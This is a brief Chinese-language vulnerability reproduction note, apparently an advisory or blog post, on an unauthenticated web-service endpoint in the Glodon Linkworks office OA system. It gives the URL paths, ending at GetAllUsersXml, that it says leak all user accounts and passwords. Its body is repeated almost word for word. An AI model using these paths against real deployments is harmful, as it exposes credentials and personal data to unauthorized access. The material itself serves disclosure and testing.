漏洞概述
广联达Linkworks办公OA系统存在未授权接口从而引发敏感信息泄露,攻击者可通过此漏洞获取账号密码登录后台,造成其他影响。
漏洞复现
/Services/Identification/Server/Login.aspx
页面访问如下所示:
拼接url路径访问: /Org/service/Service.asmx
页面返回如下:
拼接url获取系统所有用户信息: /Org/service/Service.asmx/GetAllUsersXml
广联达Linkworks办公OA系统存在未授权接口从而引发敏感信息泄露,攻击者可通过此漏洞获取账号密码登录后台,造成其他影响。
/Services/Identification/Server/Login.aspx
页面访问如下所示:
拼接url路径访问: /Org/service/Service.asmx
页面返回如下:
拼接url获取系统所有用户信息: /Org/service/Service.asmx/GetAllUsersXml